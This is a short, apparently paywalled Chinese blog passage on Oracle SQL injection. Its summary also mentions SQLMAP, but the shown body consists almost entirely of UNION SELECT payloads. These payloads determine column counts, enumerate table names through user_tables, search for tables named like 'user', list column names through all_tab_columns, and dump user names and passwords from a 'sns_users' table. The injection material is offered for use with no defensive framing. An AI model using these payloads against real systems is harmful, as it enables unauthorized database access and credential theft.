文章介绍了Oracle数据库的SQL注入技术,包括判断列数、显示错误位置、暴库名、模糊查询表名等方法。同时,详细阐述了SQLMAP工具的使用,如判断注入点、确定权限、查询数据库、表和列,以及数据猜解,提供真实案例展示如何利用SQLMAP进行登录框注入的检测和数据提取。
Oracle数据库注入
判断列数和显错位
union select '1','2' from dual
暴库名
union select '1',(select table_name from user_tables where rownum=1) from dual
模糊查询表名
查询表名一般查询admin或者user表
union select '1',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
查询列名
union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users') from dual
查询列数据
union select user_name,user_pwd from "sns_users"
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
